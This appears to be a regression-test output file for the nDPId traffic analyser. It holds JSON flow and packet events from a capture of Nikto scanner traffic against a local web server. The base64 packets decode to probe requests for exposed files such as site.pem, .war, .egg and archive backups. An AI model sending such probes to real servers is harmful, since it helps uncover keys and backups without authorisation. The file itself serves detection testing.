+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277013,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1576420277014,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277014,"pkt":"AAAAAAAAAAAAAAAACABFAADAIeRAAEAGGlJ\/AAABfwAAAcNCH5DPShmIhuR59oAYAED+tAAAAQEICp1m\/D6dZvw+R0VUIC9zaXRlLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277016,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1576420277016,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277016,"pkt":"AAAAAAAAAAAAAAAACABFAADA415AAEAGWNd\/AAABfwAAAcNEH5AFlNs7Kigy04AYAED+tAAAAQEICp1m\/ECdZvxAR0VUIC9zaXRlLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277016,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277017,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1576420277017,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277017,"pkt":"AAAAAAAAAAAAAAAACABFAADConZAAEAGmb1\/AAABfwAAAcNGH5DVgZoTcsiCOoAYAED+tgAAAQEICp1m\/EGdZvxBR0VUIC8xMjcwMDEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277017,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277019,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1576420277019,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277019,"pkt":"AAAAAAAAAAAAAAAACABFAADCTHZAAEAG771\/AAABfwAAAcNIH5DfPnQTJOA0c4AYAED+tgAAAQEICp1m\/EKdZvxCR0VUIC8xMjcwMDEud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277019,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277020,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1576420277020,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277020,"pkt":"AAAAAAAAAAAAAAAACABFAADCeAVAAEAGxC5\/AAABfwAAAcNKH5DAxUBlVYOEbYAYAED+tgAAAQEICp1m\/ESdZvxER0VUIC8xMjcwMDEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277020,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277021,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1576420277021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277021,"pkt":"AAAAAAAAAAAAAAAACABFAADC3f5AAEAGXjV\/AAABfwAAAcNMH5AeDOWcmsl5CIAYAED+tgAAAQEICp1m\/EWdZvxFR0VUIC8xMjcwMDEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277021,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277023,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1576420277023,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277023,"pkt":"AAAAAAAAAAAAAAAACABFAAC9\/jtAAEAGPf1\/AAABfwAAAcNOH5DeVcZf0\/y26IAYAED+sQAAAQEICp1m\/EedZvxHR0VUIC8xLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277023,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277025,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1576420277025,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277025,"pkt":"AAAAAAAAAAAAAAAACABFAAC9VlRAAEAG5eR\/AAABfwAAAcNQH5CjGG47rGEO3YAYAED+sQAAAQEICp1m\/EmdZvxJR0VUIC8xLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277025,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277027,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1576420277027,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277027,"pkt":"AAAAAAAAAAAAAAAACABFAADAghpAAEAGuht\/AAABfwAAAcNSH5AdH7pxZz3Y6IAYAED+tAAAAQEICp1m\/EudZvxLR0VUIC8wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277027,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277028,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1576420277028,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277028,"pkt":"AAAAAAAAAAAAAAAACABFAADA6xtAAEAGURp\/AAABfwAAAcNUH5DAadNxZUvEiYAYAED+tAAAAQEICp1m\/EydZvxMR0VUIC8wLnRhci5neiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277028,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277029,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1576420277029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277029,"pkt":"AAAAAAAAAAAAAAAACABFAADAF9FAAEAGJGV\/AAABfwAAAcNWH5ByeS+n3HjH64AYAED+tAAAAQEICp1m\/E2dZvxNR0VUIC8xMjcwLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 